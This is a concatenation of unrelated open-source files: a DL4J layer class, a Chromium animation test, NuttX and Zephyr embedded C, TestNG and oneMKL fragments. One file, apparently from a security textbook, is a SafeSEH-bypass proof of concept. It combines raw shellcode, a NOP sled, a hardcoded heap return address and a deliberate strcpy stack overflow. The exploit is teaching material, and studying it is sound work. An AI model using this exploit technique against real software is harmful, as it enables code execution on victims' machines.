import org.deeplearning4j.nn.api.ParamInitializer;
import org.deeplearning4j.nn.conf.GradientNormalization;
import org.deeplearning4j.nn.conf.InputPreProcessor;
import org.deeplearning4j.nn.conf.NeuralNetConfiguration;
import org.deeplearning4j.nn.conf.RNNFormat;
import org.deeplearning4j.nn.conf.inputs.InputType;
import org.deeplearning4j.nn.conf.layers.Layer;
import org.deeplearning4j.nn.conf.memory.LayerMemoryReport;
import org.deeplearning4j.nn.modelimport.keras.layers.TFOpLayerImpl;
import org.deeplearning4j.nn.params.EmptyParamInitializer;
import org.deeplearning4j.optimize.api.TrainingListener;
import org.nd4j.linalg.api.buffer.DataType;
import org.nd4j.linalg.api.ndarray.INDArray;
import org.nd4j.linalg.factory.Nd4j;
import org.nd4j.linalg.learning.regularization.Regularization;
import java.util.Collection;
import java.util.List;
import java.util.Map;
public class TFOpLayer extends Layer {
private Map nodeDef;
private Map constants;
public TFOpLayer(Map nodeDef, Map constants){
super();
this.nodeDef = nodeDef;
this.constants = constants;
}
@Override
public ParamInitializer initializer() {
return EmptyParamInitializer.getInstance();
}
@Override
public InputPreProcessor getPreProcessorForInputType(InputType inputType) {
return null;
}
@Override
public boolean isPretrainParam(String param){
return false;
}
@Override
public InputType getOutputType(int idx, InputType inputType){
long[] shape = inputType.getShape(true);
TFOpLayerImpl tempLayer = new TFOpLayerImpl(nodeDef, constants, null, null);
long[] outputShape = tempLayer.getOutputShape(shape);
if (outputShape.length == 3){
return InputType.recurrent(outputShape[2], outputShape[1], RNNFormat.NWC);
}
return InputType.inferInputType(Nd4j.create(outputShape));
}
@Override
public void setNIn(InputType inputType, boolean override){}
@Override
public GradientNormalization getGradientNormalization(){return null;}
@Override
public org.deeplearning4j.nn.api.Layer instantiate(NeuralNetConfiguration conf,
Collection<TrainingListener> trainingListeners, int layerIndex, INDArray layerParamsView,
boolean initializeParams, DataType networkDataType) {
TFOpLayerImpl tfOpLayerImpl = new TFOpLayerImpl(nodeDef, constants, conf, networkDataType);
tfOpLayerImpl.setListeners(trainingListeners);
tfOpLayerImpl.setIndex(layerIndex);
return tfOpLayerImpl;
}
@Override
public double getGradientNormalizationThreshold(){return 0.;}
@Override
public List<Regularization> getRegularizationByParam(String paramName){return null;}
@Override
public LayerMemoryReport getMemoryReport(InputType inputType) {
return new LayerMemoryReport(); //TODO
}
}
| 1,393 |
2,151 |
<filename>ui/gfx/animation/tween_unittest.cc
// Copyright 2013 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "ui/gfx/animation/tween.h"
#include <math.h>
#include "base/time/time.h"
#include "build/build_config.h"
#include "testing/gtest/include/gtest/gtest.h"
#include "ui/gfx/test/gfx_util.h"
#if defined(OS_WIN)
#include <float.h>
#endif
namespace gfx {
namespace {
double next_double(double d) {
#if defined(OS_WIN)
return _nextafter(d, d + 1);
#else
// Step two units of least precision towards positive infinity. On some 32
// bit x86 compilers a single step was not enough due to loss of precision in
// optimized code.
return nextafter(nextafter(d, d + 1), d + 1);
#endif
}
// Validates that the same interpolations are made as in Blink.
TEST(TweenTest, ColorValueBetween) {
// From blink's AnimatableColorTest.
EXPECT_SKCOLOR_EQ(0xFF00FF00,
Tween::ColorValueBetween(-10.0, 0xFF00FF00, 0xFF00FF00));
EXPECT_SKCOLOR_EQ(0xFF00FF00,
Tween::ColorValueBetween(-10.0, 0xFF00FF00, 0xFFFF00FF));
EXPECT_SKCOLOR_EQ(0xFF00FF00,
Tween::ColorValueBetween(0.0, 0xFF00FF00, 0xFFFF00FF));
EXPECT_SKCOLOR_EQ(0xFF01FE01,
Tween::ColorValueBetween(1.0 / 255, 0xFF00FF00, 0xFFFF00FF));
EXPECT_SKCOLOR_EQ(0xFF808080,
Tween::ColorValueBetween(0.5, 0xFF00FF00, 0xFFFF00FF));
EXPECT_SKCOLOR_EQ(
0xFFFE01FE,
Tween::ColorValueBetween(254.0 / 255.0, 0xFF00FF00, 0xFFFF00FF));
EXPECT_SKCOLOR_EQ(0xFFFF00FF,
Tween::ColorValueBetween(1.0, 0xFF00FF00, 0xFFFF00FF));
EXPECT_SKCOLOR_EQ(0xFFFF00FF,
Tween::ColorValueBetween(10.0, 0xFF00FF00, 0xFFFF00FF));
EXPECT_SKCOLOR_EQ(0xFF0C253E,
Tween::ColorValueBetween(3.0 / 16.0, 0xFF001020, 0xFF4080C0));
EXPECT_SKCOLOR_EQ(0x80FF00FF,
Tween::ColorValueBetween(0.5, 0x0000FF00, 0xFFFF00FF));
EXPECT_SKCOLOR_EQ(0x60AA55AA,
Tween::ColorValueBetween(0.5, 0x4000FF00, 0x80FF00FF));
EXPECT_SKCOLOR_EQ(0x60FFAAFF,
Tween::ColorValueBetween(0.5, 0x40FF00FF, 0x80FFFFFF));
EXPECT_SKCOLOR_EQ(0x103060A0,
Tween::ColorValueBetween(0.5, 0x10204080, 0x104080C0));
}
// Ensures that each of the 3 integers in [0, 1, 2] ae selected with equal
// weight.
TEST(TweenTest, IntValueBetween) {
EXPECT_EQ(0, Tween::IntValueBetween(0.0, 0, 2));
EXPECT_EQ(0, Tween::IntValueBetween(0.5 / 3.0, 0, 2));
EXPECT_EQ(0, Tween::IntValueBetween(1.0 / 3.0, 0, 2));
EXPECT_EQ(1, Tween::IntValueBetween(next_double(1.0 / 3.0), 0, 2));
EXPECT_EQ(1, Tween::IntValueBetween(1.5 / 3.0, 0, 2));
EXPECT_EQ(1, Tween::IntValueBetween(2.0 / 3.0, 0, 2));
EXPECT_EQ(2, Tween::IntValueBetween(next_double(2.0 / 3.0), 0, 2));
EXPECT_EQ(2, Tween::IntValueBetween(2.5 / 3.0, 0, 2));
EXPECT_EQ(2, Tween::IntValueBetween(3.0 / 3.0, 0, 2));
}
TEST(TweenTest, IntValueBetweenNegative) {
EXPECT_EQ(-2, Tween::IntValueBetween(0.0, -2, 0));
EXPECT_EQ(-2, Tween::IntValueBetween(0.5 / 3.0, -2, 0));
EXPECT_EQ(-2, Tween::IntValueBetween(1.0 / 3.0, -2, 0));
EXPECT_EQ(-1, Tween::IntValueBetween(next_double(1.0 / 3.0), -2, 0));
EXPECT_EQ(-1, Tween::IntValueBetween(1.5 / 3.0, -2, 0));
EXPECT_EQ(-1, Tween::IntValueBetween(2.0 / 3.0, -2, 0));
EXPECT_EQ(0, Tween::IntValueBetween(next_double(2.0 / 3.0), -2, 0));
EXPECT_EQ(0, Tween::IntValueBetween(2.5 / 3.0, -2, 0));
EXPECT_EQ(0, Tween::IntValueBetween(3.0 / 3.0, -2, 0));
}
TEST(TweenTest, IntValueBetweenReverse) {
EXPECT_EQ(2, Tween::IntValueBetween(0.0, 2, 0));
EXPECT_EQ(2, Tween::IntValueBetween(0.5 / 3.0, 2, 0));
EXPECT_EQ(2, Tween::IntValueBetween(1.0 / 3.0, 2, 0));
EXPECT_EQ(1, Tween::IntValueBetween(next_double(1.0 / 3.0), 2, 0));
EXPECT_EQ(1, Tween::IntValueBetween(1.5 / 3.0, 2, 0));
EXPECT_EQ(1, Tween::IntValueBetween(2.0 / 3.0, 2, 0));
EXPECT_EQ(0, Tween::IntValueBetween(next_double(2.0 / 3.0), 2, 0));
EXPECT_EQ(0, Tween::IntValueBetween(2.5 / 3.0, 2, 0));
EXPECT_EQ(0, Tween::IntValueBetween(3.0 / 3.0, 2, 0));
}
TEST(TweenTest, LinearIntValueBetween) {
EXPECT_EQ(0, Tween::LinearIntValueBetween(0.0, 0, 2));
EXPECT_EQ(0, Tween::LinearIntValueBetween(0.5 / 4.0, 0, 2));
EXPECT_EQ(0, Tween::LinearIntValueBetween(0.99 / 4.0, 0, 2));
EXPECT_EQ(1, Tween::LinearIntValueBetween(1.0 / 4.0, 0, 2));
EXPECT_EQ(1, Tween::LinearIntValueBetween(1.5 / 4.0, 0, 2));
EXPECT_EQ(1, Tween::LinearIntValueBetween(2.0 / 4.0, 0, 2));
EXPECT_EQ(1, Tween::LinearIntValueBetween(2.5 / 4.0, 0, 2));
EXPECT_EQ(1, Tween::LinearIntValueBetween(2.99 / 4.0, 0, 2));
EXPECT_EQ(2, Tween::LinearIntValueBetween(3.0 / 4.0, 0, 2));
EXPECT_EQ(2, Tween::LinearIntValueBetween(3.5 / 4.0, 0, 2));
EXPECT_EQ(2, Tween::LinearIntValueBetween(4.0 / 4.0, 0, 2));
}
TEST(TweenTest, LinearIntValueBetweenNegative) {
EXPECT_EQ(-2, Tween::LinearIntValueBetween(0.0, -2, 0));
EXPECT_EQ(-2, Tween::LinearIntValueBetween(0.5 / 4.0, -2, 0));
EXPECT_EQ(-2, Tween::LinearIntValueBetween(0.99 / 4.0, -2, 0));
EXPECT_EQ(-1, Tween::LinearIntValueBetween(1.0 / 4.0, -2, 0));
EXPECT_EQ(-1, Tween::LinearIntValueBetween(1.5 / 4.0, -2, 0));
EXPECT_EQ(-1, Tween::LinearIntValueBetween(2.0 / 4.0, -2, 0));
EXPECT_EQ(-1, Tween::LinearIntValueBetween(2.5 / 4.0, -2, 0));
EXPECT_EQ(-1, Tween::LinearIntValueBetween(2.99 / 4.0, -2, 0));
EXPECT_EQ(0, Tween::LinearIntValueBetween(3.0 / 4.0, -2, 0));
EXPECT_EQ(0, Tween::LinearIntValueBetween(3.5 / 4.0, -2, 0));
EXPECT_EQ(0, Tween::LinearIntValueBetween(4.0 / 4.0, -2, 0));
}
TEST(TweenTest, ClampedFloatValueBetweenTimeTicks) {
const float v1 = 10.0f;
const float v2 = 20.0f;
const auto t0 = base::TimeTicks();
base::TimeTicks from = t0 + base::TimeDelta::FromSecondsD(1);
base::TimeTicks to = t0 + base::TimeDelta::FromSecondsD(2);
base::TimeTicks t_before = t0 + base::TimeDelta::FromSecondsD(0.9);
base::TimeTicks t_between = t0 + base::TimeDelta::FromSecondsD(1.6);
base::TimeTicks t_after = t0 + base::TimeDelta::FromSecondsD(2.2);
EXPECT_EQ(v1, Tween::ClampedFloatValueBetween(t_before, from, v1, to, v2));
EXPECT_EQ(16.0, Tween::ClampedFloatValueBetween(t_between, from, v1, to, v2));
EXPECT_EQ(v2, Tween::ClampedFloatValueBetween(t_after, from, v1, to, v2));
}
TEST(TweenTest, SizeValueBetween) {
const gfx::SizeF s1(12.0f, 24.0f);
const gfx::SizeF s2(36.0f, 48.0f);
double before = -0.125;
double from = 0.0;
double between = 0.5;
double to = 1.0;
double after = 1.125;
EXPECT_SIZEF_EQ(gfx::SizeF(9.0f, 21.0f),
Tween::SizeValueBetween(before, s1, s2));
EXPECT_SIZEF_EQ(s1, Tween::SizeValueBetween(from, s1, s2));
EXPECT_SIZEF_EQ(gfx::SizeF(24.0f, 36.0f),
Tween::SizeValueBetween(between, s1, s2));
EXPECT_SIZEF_EQ(s2, Tween::SizeValueBetween(to, s1, s2));
EXPECT_SIZEF_EQ(gfx::SizeF(39.0f, 51.0f),
Tween::SizeValueBetween(after, s1, s2));
}
TEST(TweenTest, SizeValueBetweenClampedExtrapolation) {
const gfx::SizeF s1(0.0f, 0.0f);
const gfx::SizeF s2(36.0f, 48.0f);
double before = -1.0f;
// We should not extrapolate in this case as it would result in a negative and
// invalid size.
EXPECT_SIZEF_EQ(s1, Tween::SizeValueBetween(before, s1, s2));
}
} // namespace
} // namespace gfx
| 3,494 |
938 |
<reponame>brickviking/TinkersConstruct
{
"coverTexture": "tconstruct:book/images/covers/materials_and_you_cover.png",
"coverColor": -1,
"bookTexture": "tconstruct:book/images/covers/materials_and_you_pages.png",
"arrowColor": -1,
"slotColor": 0xE5C682,
"drawSectionListText": true,
"largePageTitles": false,
"centerPageTitles": true
}
| 135 |
640 |
/*****************************************************************************
To be the apostrophe which changed "Impossible" into "I'm possible"!
POC code of chapter 11 in book "Bypass SafeSEH by jumping into heap"
file name : SEH_Heap.cpp
author : zihan
date : 2010.04.02
description : demo show of how to bypass SafeSEH through jumping into heap
Noticed : 1 complied with VS 2008
2 disable optimization
3 build into release version
4 SEH offset and shellcode address may need
to make sure via runtime debug
version : 1.0
E-mail : <EMAIL>
Only for educational purposes enjoy the fun from exploiting :)
******************************************************************************/
#include <stdafx.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xA0\x29\x39\x00"//address of shellcode in heap
;
void test(char * input)
{
char str[200];
strcpy(str,input);
int zero=0;
zero=1/zero;
}
void main()
{
char * buf=(char *)malloc(500);
//__asm int 3
strcpy(buf,shellcode);
test(shellcode);
}
| 1,437 |
1,540 |
package test.morten;
import org.testng.annotations.Factory;
import org.testng.annotations.Test;
public class SampleTest {
private int capacity = 10;
private float loadFactor = 0.3f;
public class SampleTestTestFactory {
public SampleTestTestFactory() {} // CTR necessary ?
@Factory
public Object[] createInstances() {
return new SampleTest[] {
new SampleTest(1, 0.1f), new SampleTest(10, 0.5f),
};
}
}
public SampleTest() {}
public SampleTest(int capacity, float loadFactor) {
System.out.println("CREATING TEST WITH " + capacity);
this.capacity = capacity;
this.loadFactor = loadFactor;
}
@Test
public void testPut() {
// FIXME: This test does nothing
// HashMap hashTable = new HashMap(capacity, loadFactor);
// ...
}
}
| 276 |
1,006 |
<reponame>eenurkka/incubator-nuttx
/****************************************************************************
* arch/arm/src/tiva/cc13xx/cc13x0_trim.c
*
* Copyright (C) 2019 <NAME>. All rights reserved.
* Author: <NAME> <<EMAIL>>
*
* This is a port of TI's setup.c file (revision 49363) which has a fully
* compatible BSD license:
*
* Copyright (c) 2015-2017, Texas Instruments Incorporated
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are
* met:
*
* 1) Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* 2) Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* 3) Neither the name NuttX nor the names of its contributors may be used to
* endorse or promote products derived from this software without specific
* prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
* TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
****************************************************************************/
/****************************************************************************
* Included Files
****************************************************************************/
#include <nuttx/config.h>
#include "tiva_chipinfo.h"
#include "hardware/tiva_adi2_refsys.h"
#include "hardware/tiva_adi3_refsys.h"
#include "hardware/tiva_aon_ioc.h"
#include "hardware/tiva_aon_sysctl.h"
#include "hardware/tiva_aon_wuc.h"
#include "hardware/tiva_aux_wuc.h"
#include "hardware/tiva_ccfg.h"
#include "hardware/tiva_fcfg1.h"
#include "hardware/tiva_flash.h"
#include "hardware/tiva_prcm.h"
#include "hardware/tiva_vims.h"
#include "cc13xx/cc13x0_rom.h"
/****************************************************************************
* Private Functions
****************************************************************************/
/****************************************************************************
* Name: trim_wakeup_frompowerdown
*
* Description:
* Trims to be applied when coming from POWER_DOWN (also called when
* coming from SHUTDOWN and PIN_RESET).
*
* Returned Value:
* None
*
****************************************************************************/
static void trim_wakeup_frompowerdown(void)
{
/* Currently no specific trim for Powerdown */
}
/****************************************************************************
* Name: trim_wakeup_fromshutdown
*
* Description:
* Trims to be applied when coming from SHUTDOWN (also called when
* coming from PIN_RESET).
*
* Input Parameters:
* fcfg1_revision
*
* Returned Value:
* None
*
****************************************************************************/
static void trim_wakeup_fromshutdown(uint32_t fcfg1_revision)
{
uint32_t ccfg_modeconf;
uint32_t mp1rev;
uint32_t regval;
/* Force AUX on and enable clocks No need to save the current status of the
* power/clock registers. At this point both AUX and AON should have been
* reset to 0x0.
*/
putreg32(AON_WUC_AUXCTL_AUX_FORCE_ON, TIVA_AON_WUC_AUXCTL);
/* Wait for power on on the AUX domain */
while ((getreg32(TIVA_AON_WUC_PWRSTAT) & AON_WUC_PWRSTAT_AUX_PD_ON) == 0)
{
}
/* Enable the clocks for AUX_DDI0_OSC and AUX_ADI4 */
putreg32(AUX_WUC_MODCLKEN0_AUX_DDI0_OSC | AUX_WUC_MODCLKEN0_AUX_ADI4,
TIVA_AUX_WUC_MODCLKEN0);
/* Check in CCFG for alternative DCDC setting */
if ((getreg32(TIVA_CCFG_SIZE_AND_DIS_FLAGS) &
CCFG_SIZE_AND_DIS_FLAGS_DIS_ALT_DCDC_SETTING) == 0)
{
/* ADI3_REFSYS:DCDCCTL5[3] (=DITHER_EN) = CCFG_MODE_CONF_1[19]
* (=ALT_DCDC_DITHER_EN) ADI3_REFSYS:DCDCCTL5[2:0](=IPEAK ) =
* CCFG_MODE_CONF_1[18:16](=ALT_DCDC_IPEAK )
* Using a single 4-bit masked write since layout is equal for
* both source and destination
*/
regval = getreg32(TIVA_CCFG_MODE_CONF_1);
regval = (0xf0 | (regval >> CCFG_MODE_CONF_1_ALT_DCDC_IPEAK_SHIFT));
putreg8((uint8_t)regval,
TIVA_ADI3_REFSYS_MASK4B +
(TIVA_ADI3_REFSYS_DCDCCTL5_OFFSET * 2));
}
/* Enable for JTAG to be powered down. The JTAG domain is automatically
* powered up on if a debugger is connected. If a debugger is not
* connected this function can be used to power off the JTAG domain.
* Achieving the lowest power modes (shutdown/powerdown) requires the
* JTAG domain to be turned off. In general the JTAG domain should never
* be powered in production code.
*
* NOTE: This logic comes from the aon_wuc.h header file in the TI
* DriverLib.
*/
putreg32(0, TIVA_AON_WUC_JTAGCFG);
/* read the MODE_CONF register in CCFG */
ccfg_modeconf = getreg32(TIVA_CCFG_MODE_CONF);
/* First part of trim done after cold reset and wakeup from shutdown:
* -Configure cc13x0 boost mode. -Adjust the VDDR_TRIM_SLEEP value.
* -Configure DCDC.
*/
rom_setup_coldreset_from_shutdown_cfg1(ccfg_modeconf);
/* Second part of trim done after cold reset and wakeup from shutdown:
* -Configure XOSC.
*/
rom_setup_coldreset_from_shutdown_cfg2(fcfg1_revision, ccfg_modeconf);
/* Increased margin between digital supply voltage and VDD BOD during
* standby.
* VTRIM_UDIG: signed 4 bits value to be incremented by 2 (max = 7)
* VTRIM_BOD: unsigned 4 bits value to be decremented by 1 (min = 0) This
* applies to chips with mp1rev < 542 for cc13x0 and for mp1rev < 527 for
* cc26x0
*/
mp1rev = ((getreg32(TIVA_FCFG1_TRIM_CAL_REVISION) &
FCFG1_TRIM_CAL_REVISION_MP1_MASK) >>
FCFG1_TRIM_CAL_REVISION_MP1_SHIFT);
if (mp1rev < 542)
{
uint32_t ldo_trim_reg = getreg32(TIVA_FCFG1_BAT_RC_LDO_TRIM);
uint32_t vtrim_bod;
uint32_t vtrim_udig;
uint8_t regval8;
/* bit[27:24] unsigned */
vtrim_bod = ((ldo_trim_reg & FCFG1_BAT_RC_LDO_TRIM_VTRIM_BOD_MASK) >>
FCFG1_BAT_RC_LDO_TRIM_VTRIM_BOD_SHIFT);
/* bit[19:16] signed but treated as unsigned */
vtrim_udig = ((ldo_trim_reg & FCFG1_BAT_RC_LDO_TRIM_VTRIM_UDIG_MASK) >>
FCFG1_BAT_RC_LDO_TRIM_VTRIM_UDIG_SHIFT);
if (vtrim_bod > 0)
{
vtrim_bod -= 1;
}
if (vtrim_udig != 7)
{
if (vtrim_udig == 6)
{
vtrim_udig = 7;
}
else
{
vtrim_udig = ((vtrim_udig + 2) & 0xf);
}
}
regval8 = (vtrim_udig << ADI2_REFSYS_SOCLDOCTL0_VTRIM_UDIG_SHIFT) |
(vtrim_bod << ADI2_REFSYS_SOCLDOCTL0_VTRIM_BOD_SHIFT);
putreg8(regval8, TIVA_ADI2_REFSYS_SOCLDOCTL0);
}
/* Third part of trim done after cold reset and wakeup from shutdown:
* -Configure HPOSC. -Setup the LF clock.
*/
rom_setup_coldreset_from_shutdown_cfg3(ccfg_modeconf);
/* Allow AUX to power down */
rom_aonwuc_powerctrl(AUX_WUC_POWER_DOWN);
/* Leaving on AUX and clock for AUX_DDI0_OSC on but turn off clock for
* AUX_ADI4
*/
putreg32(AUX_WUC_MODCLKEN0_AUX_DDI0_OSC, TIVA_AUX_WUC_MODCLKEN0);
/* Disable EFUSE clock */
regval = getreg32(TIVA_FLASH_CFG);
regval |= FLASH_CFG_DIS_EFUSECLK;
putreg32(regval, TIVA_FLASH_CFG);
}
/****************************************************************************
* Name: trim_coldreset
*
* Description:
* Trims to be applied when coming from PIN_RESET.
*
* Returned Value:
* None
*
****************************************************************************/
static void trim_coldreset(void)
{
/* Currently no specific trim for Cold Reset */
}
/****************************************************************************
* Public Functions
****************************************************************************/
/****************************************************************************
* Name: cc13xx_trim_device
*
* Description:
* Perform the necessary trim of the device which is not done in boot code
*
* This function should only execute coming from ROM boot. The current
* implementation does not take soft reset into account. However, it does
* no damage to execute it again. It only consumes time.
*
****************************************************************************/
void cc13xx_trim_device(void)
{
uint32_t fcfg1_revision;
uint32_t aon_sysresetctrl;
uint32_t regval;
/* Get layout revision of the factory configuration area (Handle undefined
* revision as revision = 0)
*/
fcfg1_revision = getreg32(TIVA_FCFG1_FCFG1_REVISION);
if (fcfg1_revision == 0xffffffff)
{
fcfg1_revision = 0;
}
/* This setup file is for CC13x0 PG2.0 and later. Halt if violated */
chipinfo_verify();
/* Enable standby in flash bank */
regval = getreg32(TIVA_FLASH_CFG);
regval &= ~FLASH_CFG_DIS_STANDBY;
putreg32(regval, TIVA_FLASH_CFG);
/* Clock must always be enabled for the semaphore module (due to ADI/DDI HW
* workaround)
*/
putreg32(AUX_WUC_MODCLKEN1_SMPH, TIVA_AUX_WUC_MODCLKEN1);
/* Warm resets on CC13x0 and CC26x0 complicates software design because
* much of our software expect that initialization is done from a full
* system reset. This includes RTC setup, oscillator configuration and
* AUX setup. To ensure a full reset of the device is done when customers
* get e.g. a Watchdog reset, the following is set here:
*/
regval = getreg32(TIVA_PRCM_WARMRESET);
regval |= PRCM_WARMRESET_WRTO_PINRESET;
putreg32(regval, TIVA_PRCM_WARMRESET);
/* Select correct CACHE mode and set correct CACHE configuration */
rom_setup_cachemode();
/* 1. Check for powerdown
* 2. Check for shutdown
* 3. Assume cold reset if none of the above.
*
* It is always assumed that the application will freeze the latches in
* AON_IOC when going to powerdown in order to retain the values on the
* IOs. NB. If this bit is not cleared before proceeding to powerdown,
* the IOs will all default to the reset configuration when
* restarting.
*/
if ((getreg32(TIVA_AON_IOC_IOCLATCH) & AON_IOC_IOCLATCH_EN) == 0)
{
/* NB. This should be calling a ROM implementation of required trim and
* compensation e.g. trim_wakeup_frompowerdown()
*/
trim_wakeup_frompowerdown();
}
/* Check for shutdown.
* When device is going to shutdown the hardware will automatically clear
* the SLEEPDIS bit in the SLEEP register in the AON_SYSCTL module.
* It is left for the application to assert this bit when waking back
* up, but not before the desired IO configuration has been re-established.
*/
else if ((getreg32(TIVA_AON_SYSCTL_SLEEPCTL) &
AON_SYSCTL_SLEEPCTL_IO_PAD_SLEEP_DIS) == 0)
{
/* NB. This should be calling a ROM implementation of required trim and
* compensation e.g. trim_wakeup_fromshutdown() -->
* trim_wakeup_frompowerdown();
*/
trim_wakeup_fromshutdown(fcfg1_revision);
trim_wakeup_frompowerdown();
}
else
{
/* Consider adding a check for soft reset to allow debugging to skip
* this section!!! NB. This should be calling a ROM implementation of
* required trim and compensation e.g. trim_coldreset() -->
* trim_wakeup_fromshutdown() --> trim_wakeup_frompowerdown()
*/
trim_coldreset();
trim_wakeup_fromshutdown(fcfg1_revision);
trim_wakeup_frompowerdown();
}
/* Set VIMS power domain control. PDCTL1VIMS = 0 ==> VIMS power domain is
* only powered when CPU power domain is powered
*/
putreg32(0, TIVA_PRCM_PDCTL1VIMS);
/* Configure optimal wait time for flash FSM in cases where flash pump
* wakes up from sleep
*/
regval = getreg32(TIVA_FLASH_FPAC1);
regval &= ~FLASH_FPAC1_PSLEEPTDIS_MASK;
regval |= (0x139 << FLASH_FPAC1_PSLEEPTDIS_SHIFT);
putreg32(regval, TIVA_FLASH_FPAC1);
/* And finally at the end of the flash boot process: SET BOOT_DET bits in
* AON_SYSCTL to 3 if already found to be 1 Note: The BOOT_DET_x_CLR/SET
* bits must be manually cleared
*/
if ((getreg32(TIVA_AON_SYSCTL_RESETCTL) &
(AON_SYSCTL_RESETCTL_BOOT_DET_1 | AON_SYSCTL_RESETCTL_BOOT_DET_0))
== AON_SYSCTL_RESETCTL_BOOT_DET_0)
{
aon_sysresetctrl = getreg32(TIVA_AON_SYSCTL_RESETCTL);
aon_sysresetctrl &= ~(AON_SYSCTL_RESETCTL_BOOT_DET_1_CLR |
AON_SYSCTL_RESETCTL_BOOT_DET_0_CLR |
AON_SYSCTL_RESETCTL_BOOT_DET_1_SET |
AON_SYSCTL_RESETCTL_BOOT_DET_0_SET);
putreg32(aon_sysresetctrl | AON_SYSCTL_RESETCTL_BOOT_DET_1_SET,
TIVA_AON_SYSCTL_RESETCTL);
putreg32(aon_sysresetctrl, TIVA_AON_SYSCTL_RESETCTL);
}
/* Make sure there are no ongoing VIMS mode change when leaving
* cc13x0_trim_device() (There should typically be no wait time here, but
* need to be sure)
*/
while ((getreg32(TIVA_VIMS_STAT) & VIMS_STAT_MODE_CHANGING) != 0)
{
/* Do nothing - wait for an eventual ongoing mode change to complete. */
}
}
| 5,420 |
6,224 |
/*
* Copyright (c) 2017 Nordic Semiconductor ASA
* Copyright (c) 2015 Runtime Inc
*
* SPDX-License-Identifier: Apache-2.0
*/
#include <fs/fcb.h>
#include "fcb_priv.h"
/*
* Call 'cb' for every element in flash circular buffer. If sector is specified,
* only elements with that flash_sector are reported.
*/
int
fcb_walk(struct fcb *fcb, struct flash_sector *sector, fcb_walk_cb cb,
void *cb_arg)
{
struct fcb_entry_ctx entry_ctx;
int rc;
entry_ctx.loc.fe_sector = sector;
entry_ctx.loc.fe_elem_off = 0U;
rc = k_mutex_lock(&fcb->f_mtx, K_FOREVER);
if (rc < 0) {
return -EINVAL;
}
while ((rc = fcb_getnext_nolock(fcb, &entry_ctx.loc)) !=
-ENOTSUP) {
k_mutex_unlock(&fcb->f_mtx);
if (sector && entry_ctx.loc.fe_sector != sector) {
return 0;
}
entry_ctx.fap = fcb->fap;
rc = cb(&entry_ctx, cb_arg);
if (rc) {
return rc;
}
rc = k_mutex_lock(&fcb->f_mtx, K_FOREVER);
if (rc < 0) {
return -EINVAL;
}
}
k_mutex_unlock(&fcb->f_mtx);
return 0;
}
| 457 |
310 |
<filename>Libraries/oneMKL/block_cholesky_decomposition/factor.cpp
//==============================================================
// Copyright © 2020 Intel Corporation
//
// SPDX-License-Identifier: MIT
// =============================================================
/*
*
* Content:
* Example of Cholesky factorization of a symmetric positive
* definite block tridiagonal matrix
************************************************************************
* Purpose:
* ========
* Testing accuracy of Cholesky factorization A=
* | L_1 | | L_1^t C_1^t |
* | C_1 L_2 | | L_2^t C_2^t |
* A = | . . |*| . . |
* | . . | | . C_N-1^t |
* | C_N-1 L_N | | L_N^t |
*
* of a symmetric positive definite block tridiagonal matrix A
* | D_1 B_1^t |
* | B_1 D_2 B_2^t |
* | B_2 D_3 B_3^t |
